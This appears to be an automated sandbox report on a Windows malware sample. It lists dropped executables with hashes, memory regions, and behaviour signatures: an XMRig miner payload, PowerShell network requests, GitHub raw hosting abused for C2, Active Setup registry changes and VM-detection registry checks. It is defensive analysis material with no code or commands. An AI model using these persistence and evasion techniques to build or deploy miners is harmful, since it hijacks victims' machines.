| SHA1 | ab8c8dbb147aa753a8969b657e023d4d16820ec1 |
| SHA256 | 2007eadfba08cf12601dda181c7271b57467ebc99b3ae7ed030ba354c5736cfc |
| SHA512 | e4d6b2b4edf93c963a64a3b9c812af2a4f4008505b90ddd681158269110198e0220828b92ffa45df400fea49be79589ded9e682b0042310311ee548759c0808c |
C:\Windows\System\RLvenfC.exe
| MD5 | e3b178e63348b876b639dd9da448f9e6 |
| SHA1 | be3bfeba296ed7d99c1c930be72a9f9095ad779c |
| SHA256 | 3c9f4b2aa1e08801727e30ec64904195d266db5dda714934c94a23f87d6d4c9d |
| SHA512 | e02a0ccad77a4b5292cb12397bb0e0743f3f396e6b56f4bc6073bb18917c87a915b9121ecf71d527df3954027a244903711fdbf46308a06496f239641f903d84 |
C:\Windows\System\AmtaodT.exe
| MD5 | 2e0b988b929ede19715e6959c1acd8cd |
| SHA1 | bf3a114b80e7952e54a1ee8bf8ec0c80b84d441b |
| SHA256 | 892b54d1406bbdabc3a59684fc86c25aa9020d2f4436e8c7970c0682598e14e9 |
| SHA512 | fe89b3f61738c1f64460a542fae3f49ed080a69dfac77f78307ca1aa68812608bd2008e03cb2b2377e44f48d46e658718f98636deb92721f648f8b71659737b7 |
C:\Windows\System\ybHZLWM.exe
| MD5 | c7e49d02be44b28e209666a23c76b088 |
| SHA1 | 73fdadfe6017a7b06e93a1b4c5b514836d554725 |
| SHA256 | 3c1f6eeb79cd08be237ba48f752deb689a3a54c77e8d528286c042805cb85e80 |
| SHA512 | 18c0cc8f73d43440d4231985f3b79a4688db5187de09267093b089a2e0a13dab096f589bb71167bce85ba85b8805b55498e11695fb2fd3ed07c97e88070ec1b6 |
C:\Windows\System\nKADzeH.exe
| MD5 | 9337b0a8e904d8f93e99ec3297cf6f42 |
| SHA1 | 0de6d5277a04e85dbda0c7bd72680b84d90161a3 |
| SHA256 | f25fb9894ff607c084c5559657726c74ef690328eec75803274f669e2919fe80 |
| SHA512 | fcf01c38bf02727e89134a10ff04e7c536fab764e6c09b93f8ad3a66aa641d07cfa9776c26936d5619fa5561094b6ff947e107ec83c3cc31286bd1f67bf0fb03 |
C:\Windows\System\trEJEmh.exe
| MD5 | c93ff1d6958f40695642d94e1426b808 |
| SHA1 | c5a730e9506d63b78e545d4780c1dbbbd1f11769 |
| SHA256 | 1acd1baa6e404c6b2a911413170e50c79162b796e0e79548a45f57236adbd73d |
| SHA512 | 8b6ba184a39cf43dd2e62ce89c91e2a4de6368930cf468b4ef91102dffa5e7a5075f8e9d765c1a4d231fa6419403f8f2b57486e33bbd2c0b32df0ced00d2862a |
C:\Windows\System\ScQKdch.exe
| MD5 | 8e967b90d6a20298428b6c3bfe8048df |
| SHA1 | 68844d2006bffcc659b621c22b78190f8ac53e66 |
| SHA256 | 60f8e4fb18d40ff5ce021132d09eef088fc09573321fcc3d223812b5f2ca41ba |
| SHA512 | 49522377bc3831a34ab8abacc715111c36abff3ce61fc9d8cf5a962f704470177f19aee4adf172c32f55aacc8bc7d903916a21bfbc367a206bed543962c2ea6b |
C:\Windows\System\JJjLlUH.exe
| MD5 | 124086b108447fda3ef924f6fe0212d0 |
| SHA1 | 9d13aefecbe23a5d21a2f12fc6b8cb2213af1d10 |
| SHA256 | 4f82d7447d58dfc6131f3a1b7bd4a6af4314f3eac6e5a475688b05e8f4cfa218 |
| SHA512 | a5d67b9cb9af6c913ddb9a1cd0fac2fcb5fadb34c2bf5fe6b1911c5b440241f88dce6685852e803ea3e82329c7ba5ebcdac3ffb764aa689857fc2e1cc3b17a25 |
C:\Windows\System\ygtUIca.exe
| MD5 | a0c1516ce1f734f631eee4cfc53a8296 |
| SHA1 | 867d3fdc2e2dcaa38051276d053841c70a783d83 |
| SHA256 | 09fa0a88936ad3cf2a487b90fd4b1450cd443c4afc237f21299dc1ccfa0f2024 |
| SHA512 | 7f5e8f5dc8bdbf9622f74b264feb38413f74cea814718dc62621d0d985bbf58b161aa00d03406aba3db8bb1452ebe2b0d3bec225124219f3cf464f76809c28a2 |
C:\Windows\System\qUtHKyC.exe
| MD5 | d465c6b992b22a48b7e4e168129e8c04 |
| SHA1 | 60ce0fb5991a62bb0ac92da0315f39898d5dc5bb |
| SHA256 | 27855e9c45bd41e9830280a648aee592ccbc668e4d860493321f7983bcac3233 |
| SHA512 | 26d22b36d2a124ede88e11ac954e26a36f4c1e2fb9796bb05caa11172fa7724b56e7329421ef5d1f4b55d3e5984c90a0b0436f2ce81d700bfc9d28a584dcf148 |
C:\Windows\System\TAOyIgC.exe
| MD5 | b68b72e79bcb51ed67b0609f161e4c3d |
| SHA1 | d5020dfb9642e662efaba8a36194cdc5a6e3d534 |
| SHA256 | 31d6eb84a3b5a7115c70a69322e0863819aa2263d3b7012676a8fa5a49f7cfeb |
| SHA512 | b3c12a1a4128f115515c6a2a318873097737c76608b6995dc899601fb8ba8f4ef08855cae2e848fa6bbe9e0f323aa75c36840b32d392177c8c8d48bdfa400ded |
C:\Windows\System\ILGXdDw.exe
| MD5 | c0f5049da5e309570a5bec1b718669db |
| SHA1 | 8fbbe12ad0acef1094de0135888d27e28b437f14 |
| SHA256 | 4a302cc15f01ec5c05836bb6488ce2522154438d928a0e033c093e60cafd6451 |
| SHA512 | 735b38703ffa6ac1c49111ea12efc684eeab6501132112d4ddbc8045ea4b09b85939135e217a7ae3aa2c081c8a34a74cf6c2456969eb4a10b056eb1e74905af5 |
C:\Windows\System\OuNGpZq.exe
| MD5 | 67deac45f365e72a0713b3509f786af2 |
| SHA1 | a80b29f12e08cccba6ceb9276f6e0c9ee6f53bc3 |
| SHA256 | f92cc4a377ffe7db1e12e7de227987adbcfa57bb4ada75c4e63833e964ad4a64 |
| SHA512 | 5a6fb6ccc938bc1a8b49f875f46594e198dc33622ddb4061a78ea4456c2c1a89169881a7009b81746d2e549ea707d008141081695074e6d6d96a5487291dd810 |
C:\Windows\System\XDZxNQE.exe
| MD5 | a4c65f92ac6e92a62469f68d4adadd6c |
| SHA1 | 63238b67c9b23baf59aebafa9ceaf4b3f3ca8d8c |
| SHA256 | 45c1a823f29f872f2640ab61eabca7949d688eb4751ca7c2f57e4cf1ebb6f4d4 |
| SHA512 | ec751db0b16898ff41ef15052e38e7f9a8afc1c1434ea7d3334a87bebd348622f93df31de179e86e75f4c739b76de5c8308e5a061753b97710cc0accd085fb84 |
memory/2564-96-0x000001B8F4C40000-0x000001B8F4C62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fzn2kedk.tia.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Windows\System\pyyHgjv.exe
| MD5 | 4f838111fe2c0bd0881639b04db13cf4 |
| SHA1 | 9f38af039f52c4a173ed0c17691bfa1357b4af23 |
| SHA256 | 54c4d0e8e47a36d8a00d69279ff1c023d18a994716255796da73a56b9ee432e0 |
| SHA512 | a7246d177175736662de39bcd9c6215af9e1e3b8b68a7f4e8ce3832a8fc37681adae637b50e0df7fc7cf2541b8aa102f546665d693d6aca2b32c017bce27c4be |
C:\Windows\System\bLpZMhH.exe
| MD5 | 5410dbf2e1a6c59968c804316ea48bba |
| SHA1 | de760a3856852764aa02f318db95a8b5cd183354 |
| SHA256 | 13cb07bdd448e1c4acf0babd089ab512f5db63dea1a92d4c86d938f3b4dffe79 |
| SHA512 | a232aa928d892ee60d35bccf330a1bd0f8eb0c3ee9dd3ea57902f27a132b87aeb63bd206b54417f5f985a7a7092e28ef7161ddf5a8a052446728c8eda215e13d |
C:\Windows\System\SwCQmTw.exe
| MD5 | 697e664be18f248459750675ec0823cf |
| SHA1 | 848b3815ec4c94f7eb137a9bdb5eca262c186814 |
| SHA256 | e05b6b998adf8b8a1da1dde428d5765d231c65b79a502b5674dc69d7f5af864d |
| SHA512 | 510685fba9647d8ac89d125ad9d7a0e282f6e7a2ce13e8f9c00e8614fe53d06504847f5e3731c10c20ce7cee1f9c9036e5209e52d982d9a267261c9eb1c93633 |
C:\Windows\System\nwWVnrF.exe
| MD5 | d4d57728c3e98392113919f4bee9a918 |
| SHA1 | 95debce5bed9e9165c29518ae3d3084eadc4dfb8 |
| SHA256 | 4b47c3585547baee42e388743adae4aa6ac7a2d3374f9b8d4cf8b1d77cf19ad1 |
| SHA512 | c13d911080b2c6e7dfe6699d7f3f1976be53920a99b330f1a9b7a949eac6ebb51d1bd4391076d0978f6eb3b5cc45f377af8659e9cf2036ed44d54e16a36df332 |
C:\Windows\System\urUyRME.exe
| MD5 | 4ed4f9c744d1a067e2e8b3d2db75898f |
| SHA1 | fd4b67c25e629f0831bf759266bba332bccc6dbd |
| SHA256 | 38d1730aefe64fab081a4dcd97831ec4861b388ef760279436172cb7ca36ae12 |
| SHA512 | 0d06ea19aeb3d7ac64d0a305c198e77da53d60cf5e24fe62e15acd95a8527f9d967a96a03758e812416db213a5b0aee7ffd7d811cea885ce9a2f25f6fa3aa7e4 |
C:\Windows\System\PpisgNH.exe
| MD5 | 1a73f9902f9e57449a9dbd8d01f39f80 |
| SHA1 | bd7782e28b376da53fbcd712109e2b129407a2c3 |
| SHA256 | d5f9d0e13d91072511316f83d416017e4c4e6f45a4bb87d310307e61cd1b1b63 |
| SHA512 | fa2f1b4e184638056df76a0950a70370be5d156a21c655aa28bbe83837564f3123dd50e3ffeac5514023e76f028c7a232755d4de68d253935aa937f8b4a7e7c8 |
C:\Windows\System\qndCowM.exe
| MD5 | 42b896360b04dd1295309933d8f2c56b |
| SHA1 | d802d8023a57527817c2ed6953e13069e8328146 |
| SHA256 | 2d78215df272f1fde2b682455b87a327818bcdda7c24c428f97858c05f17f15d |
| SHA512 | e8ddb7fa9021a0f8394ab559115f60f4f16cee3e81f42526f91dce80285bd0271db2ef170c2996ccd42384b5f55a92ef7b5728e5fa20adf8f1d1cb39b1caa197 |
C:\Windows\System\sOalaow.exe
| MD5 | a0adef72b8473f4a4d91c6ed1c36953d |
| SHA1 | 59d0f067c05aaa37c64b9a9c1e4456cec9275ea9 |
| SHA256 | b79ec5771077b1baf3eb4defd8516ae377a303795d1540ca8a4349afefb6cb11 |
| SHA512 | c2ff131c3f4bb1bde6eaf47d9acbad228e6726716e201cbd82b37f65a89f0b3ad1490e29700f3bfbfd15d46a277cb04866d8d5be2cc7f2932cf2c0fbbccd465f |
memory/3304-20-0x00007FF63EAF0000-0x00007FF63EEE6000-memory.dmp
C:\Windows\System\axVNZQz.exe
| MD5 | 757f411fecb96f87e8f04bb82f2fa8d1 |
| SHA1 | ed7ae496fd85f9ccc12f72809686217746b59d0f |
| SHA256 | d295b8f1b75770f67069c0ddccbda1f9f0a5a407363f4309d19f4aaf9b560d25 |
| SHA512 | 59c99126e20f0caa09f50732fa0338d2beca45184c866b31fab7cdd63cc0de72d323bfb823bd7270326d1c36db7a31bcd1776099e6381d75b7e5a2f757bd3b68 |
C:\Windows\System\aPjGTGe.exe
| MD5 | 4eac20683b3e6107d10b3aaf46f63092 |
| SHA1 | 22fa0d0d8a2b84fae94e1aea468cb88e2adff787 |
| SHA256 | 62108aa93d33b51b2a0148d0375952995736f3d6b4cd5379df782a5f80e78506 |
| SHA512 | 9f73c762d1bf6453f54639065118fccd451ca7dd850e9b3b2518751399bc5ccbb8574cdcb49d5b2f5533c932c86a5cd274e265a5eb62947ff0ee22475d36f3c3 |
memory/2452-10-0x00007FF683850000-0x00007FF683C46000-memory.dmp
memory/868-781-0x00007FF732FC0000-0x00007FF7333B6000-memory.dmp
memory/4376-788-0x00007FF70C050000-0x00007FF70C446000-memory.dmp
memory/3760-806-0x00007FF6F21A0000-0x00007FF6F2596000-memory.dmp
memory/1720-798-0x00007FF7931D0000-0x00007FF7935C6000-memory.dmp
memory/3544-794-0x00007FF691800000-0x00007FF691BF6000-memory.dmp
memory/3640-783-0x00007FF61D570000-0x00007FF61D966000-memory.dmp
memory/1716-809-0x00007FF6BA080000-0x00007FF6BA476000-memory.dmp
memory/8-816-0x00007FF7643C0000-0x00007FF7647B6000-memory.dmp
memory/1864-822-0x00007FF6EBE20000-0x00007FF6EC216000-memory.dmp
memory/2004-835-0x00007FF71F4D0000-0x00007FF71F8C6000-memory.dmp
memory/376-848-0x00007FF62EC10000-0x00007FF62F006000-memory.dmp
memory/888-852-0x00007FF66F3C0000-0x00007FF66F7B6000-memory.dmp
memory/3048-856-0x00007FF692270000-0x00007FF692666000-memory.dmp
memory/3316-850-0x00007FF745700000-0x00007FF745AF6000-memory.dmp
memory/3624-845-0x00007FF798660000-0x00007FF798A56000-memory.dmp
memory/3112-842-0x00007FF610590000-0x00007FF610986000-memory.dmp
memory/4692-839-0x00007FF766420000-0x00007FF766816000-memory.dmp
memory/5088-830-0x00007FF6E9BB0000-0x00007FF6E9FA6000-memory.dmp
memory/4424-826-0x00007FF65C290000-0x00007FF65C686000-memory.dmp
C:\Windows\System\hOrGcVk.exe
| MD5 | 6c6a33c852f4e05ffd14cdf0dcab7779 |
| SHA1 | 70449821f99925d7b8d245181569b7ac4d2ffae8 |
| SHA256 | 889f3baefc9f46c7632a467db8882ec92f1f0df14da91d5a211e7484de261e45 |
| SHA512 | 92e5654661ef50c470f84dbec4dcad9efdca5e4026c073f08c798af48c0b5d8107a7b2ff4d63fdb982f371e15d79e95f8a6d716a30b5c5123a7273c49d650d19 |
memory/2452-2105-0x00007FF683850000-0x00007FF683C46000-memory.dmp
memory/1468-2106-0x00007FF6F9C50000-0x00007FF6FA046000-memory.dmp
memory/2792-2107-0x00007FF64AAF0000-0x00007FF64AEE6000-memory.dmp
memory/980-2108-0x00007FF634210000-0x00007FF634606000-memory.dmp
memory/3304-2109-0x00007FF63EAF0000-0x00007FF63EEE6000-memory.dmp
memory/2452-2119-0x00007FF683850000-0x00007FF683C46000-memory.dmp
memory/3304-2120-0x00007FF63EAF0000-0x00007FF63EEE6000-memory.dmp
memory/2792-2122-0x00007FF64AAF0000-0x00007FF64AEE6000-memory.dmp
memory/1468-2121-0x00007FF6F9C50000-0x00007FF6FA046000-memory.dmp
memory/3316-2125-0x00007FF745700000-0x00007FF745AF6000-memory.dmp
memory/980-2124-0x00007FF634210000-0x00007FF634606000-memory.dmp
memory/888-2123-0x00007FF66F3C0000-0x00007FF66F7B6000-memory.dmp
memory/3048-2126-0x00007FF692270000-0x00007FF692666000-memory.dmp
memory/868-2130-0x00007FF732FC0000-0x00007FF7333B6000-memory.dmp
memory/1720-2132-0x00007FF7931D0000-0x00007FF7935C6000-memory.dmp
memory/3760-2131-0x00007FF6F21A0000-0x00007FF6F2596000-memory.dmp
memory/3640-2129-0x00007FF61D570000-0x00007FF61D966000-memory.dmp
memory/4376-2128-0x00007FF70C050000-0x00007FF70C446000-memory.dmp
memory/3544-2127-0x00007FF691800000-0x00007FF691BF6000-memory.dmp
memory/5088-2134-0x00007FF6E9BB0000-0x00007FF6E9FA6000-memory.dmp
memory/2004-2137-0x00007FF71F4D0000-0x00007FF71F8C6000-memory.dmp
memory/3112-2142-0x00007FF610590000-0x00007FF610986000-memory.dmp
memory/3624-2141-0x00007FF798660000-0x00007FF798A56000-memory.dmp
memory/376-2140-0x00007FF62EC10000-0x00007FF62F006000-memory.dmp
memory/1864-2139-0x00007FF6EBE20000-0x00007FF6EC216000-memory.dmp
memory/8-2136-0x00007FF7643C0000-0x00007FF7647B6000-memory.dmp
memory/4692-2135-0x00007FF766420000-0x00007FF766816000-memory.dmp
memory/1716-2133-0x00007FF6BA080000-0x00007FF6BA476000-memory.dmp
memory/4424-2138-0x00007FF65C290000-0x00007FF65C686000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-03 22:03
Reported
2024-06-03 22:19
Platform
win11-20240426-en
Max time kernel
957s
Max time network
512s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Active Setup\Installed Components | N/A | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | N/A | N/A |
| File opened (read-only) | \??\D: | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in Windows directory
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | N/A | N/A |
